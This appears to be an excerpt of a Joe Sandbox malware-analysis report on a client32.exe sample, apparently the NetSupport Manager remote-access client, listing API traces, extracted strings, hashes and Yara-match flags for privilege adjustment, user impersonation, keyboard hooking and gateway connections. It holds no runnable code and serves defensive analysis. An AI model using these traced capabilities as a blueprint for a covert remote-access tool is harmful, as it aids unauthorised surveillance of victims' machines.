                                                                                                • String ID: Client32$NSMWClass$NSMWClass
                                                                                                • API String ID: 3192549508-611217420
                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,0041D3B8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                • EqualSid.ADVAPI32(?,0041D3B8,?,00000001,00000001), ref: 1109EDC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                • String ID:
                                                                                                • API String ID: 1878589025-0
                                                                                                • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                                • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,986DAFD2,00080000,00000000,?), ref: 1109D88D
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID:
                                                                                                • API String ID: 2349140579-0
                                                                                                • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                                • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                                APIs
                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                                • CloseHandle.KERNEL32(?), ref: 1109D915
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                • String ID:
                                                                                                • API String ID: 81990902-0
                                                                                                • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                                • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • GetSystemMetrics.USER32(00002000,00000054,?,00000020,00000056,?,00000020), ref: 1102ED54
                                                                                                • FindWindowA.USER32 ref: 1102EF15
                                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32((aB,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32((aB,?,11031700), ref: 11110EAC
                                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                                  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000), ref: 11094F59
                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                                • FindWindowA.USER32 ref: 1102EFFD
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                                • LoadIconA.USER32(11000000,000004C1,?,?,?,View,Client,Bridge), ref: 1102F521
                                                                                                • LoadIconA.USER32(11000000,000004C2,?,?,?,View,Client,Bridge), ref: 1102F531
                                                                                                • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F557
                                                                                                • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F568
                                                                                                  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                                  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                                  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                                  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                                • DispatchMessageA.USER32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 11030136
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110303D4
                                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                                • SetWindowPos.USER32(000103BC,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 11030449
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110304CA
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,986DAFD2,?,?,00000000), ref: 1112909A
                                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                                  • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$445817$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                • API String ID: 372548862-3380588243
                                                                                                • Opcode ID: 9e5f71a37083c33384178188806141142b121f6025a23487265c9df25a7219e6
                                                                                                • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                                • Opcode Fuzzy Hash: 9e5f71a37083c33384178188806141142b121f6025a23487265c9df25a7219e6
                                                                                                • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc_memsetwsprintf
                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$445817$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                • API String ID: 3802068140-1091921282
                                                                                                • Opcode ID: 5d39502fb8738d552d5eb44f35007f7541f7d141e789a8db14d18e146d75462b
                                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                • Opcode Fuzzy Hash: 5d39502fb8738d552d5eb44f35007f7541f7d141e789a8db14d18e146d75462b
                                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: *Dept$*Gsk$1.1$445817$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                • API String ID: 2102423945-3577143777
                                                                                                • Opcode ID: 89b8c303495c6bb78fbccd0a45cc7f5db6ddf82422dc33ddaaea6efea41dea8e
                                                                                                • Instruction ID: 7b1bb2c9ad3064764f4fdd1ed755b5c51c3f81c3dbbeab9d0e06924da5abe084
                                                                                                • Opcode Fuzzy Hash: 89b8c303495c6bb78fbccd0a45cc7f5db6ddf82422dc33ddaaea6efea41dea8e
                                                                                                • Instruction Fuzzy Hash: 17E1B3B6C0021C6ADB24DB60DC90FEF7378AF55319F8090E9F609A3545EB355B898FA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,756F110C), ref: 11144173
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                • API String ID: 3874234733-2061581830
                                                                                                • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102E501
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: $18/11/16 11:28:14 V12.10F20$445817$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                • API String ID: 1029625771-2194706773
                                                                                                • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE63E8
                                                                                                • InterlockedDecrement.KERNEL32(-0003F3B7,?,00000000,?,69CED77B,00000000), ref: 69CE63FA
                                                                                                • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,69CED77B,00000000), ref: 69CE6412
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE643B
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE6450
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE646F
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE6484
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,00000000,?,69CED77B,00000000), ref: 69CE64A3
                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,69CED77B,00000000), ref: 69CE64C5
                                                                                                • shutdown.WSOCK32(?,00000001), ref: 69CE64E9
                                                                                                • GetLastError.KERNEL32(?,00000000,?,69CED77B,00000000), ref: 69CE64F2
                                                                                                • timeGetTime.WINMM ref: 69CE6510
                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6526
                                                                                                • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6533
                                                                                                • timeGetTime.WINMM ref: 69CE6540
                                                                                                • Sleep.KERNEL32(00000001,?,00000000,?,69CED77B,00000000), ref: 69CE654B
                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE6563
                                                                                                • closesocket.WSOCK32(?), ref: 69CE6574
                                                                                                • WSAGetLastError.WSOCK32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE657D
                                                                                                • Sleep.KERNEL32(00000032,?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE658E
                                                                                                • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,69CED77B,00000000), ref: 69CE659E
                                                                                                • _memset.LIBCMT ref: 69CE65C8
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,69CED77B,00000000), ref: 69CE65D7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,?,69CED77B,00000000), ref: 69CE65F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle$&}s
                                                                                                • API String ID: 3764039262-698344514

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x$&}s
                                                                                                • API String ID: 909875538-151058507

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 11142063
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                • LoadLibraryA.KERNEL32(imm32), ref: 111420F6
                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                • _memset.LIBCMT ref: 11142169
                                                                                                • LoadCursorA.USER32(00000000,00007F00,?,?,?,?,?,00000000,?), ref: 111421B9
                                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                • RegisterClassExA.USER32 ref: 111421DA
                                                                                                • LoadLibraryA.KERNEL32(pcihooks), ref: 11142272
                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard,?,?,00000000,?), ref: 11142287
                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                • LoadLibraryA.KERNEL32(riched32.dll), ref: 111423E3
                                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,986DAFD2,11030346,00000000), ref: 11017A6E
                                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                  • Part of subcall function 11017A40: QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32 ref: 110CCCC9
                                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoItemLongObjectQueueRegisterStockTimerUserWindowWork_memset
                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                • API String ID: 3910702804-3145203681

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73631528,?,0000001A), ref: 11028CFD
                                                                                                • _strrchr.LIBCMT ref: 11028D0C
                                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                • API String ID: 1609618855-357498123
                                                                                                • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6BD5
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6C26
                                                                                                • Sleep.KERNEL32(00000064), ref: 69CF6C5B
                                                                                                  • Part of subcall function 69CF6940: GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                • WaitForSingleObject.KERNEL32(00000180,?), ref: 69CF6C7C
                                                                                                • _memmove.LIBCMT ref: 69CF6C93
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 69CF6CB4
                                                                                                • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 69CF6CD9
                                                                                                • GetTickCount.KERNEL32(00000000,?,00000000,00000000,?), ref: 69CF6CEC
                                                                                                • _calloc.LIBCMT ref: 69CF6D76
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,00001001,00000001), ref: 69CF6DF3
                                                                                                • InterlockedExchange.KERNEL32(02EF3002,00000000,?,?,?,?,?,?,?,?,00001001,00000001), ref: 69CF6E01
                                                                                                • _calloc.LIBCMT ref: 69CF6E33
                                                                                                • _memmove.LIBCMT ref: 69CF6E47
                                                                                                • InterlockedDecrement.KERNEL32(02EF2FAA), ref: 69CF6EC3
                                                                                                • SetEvent.KERNEL32(0000017C), ref: 69CF6ECF
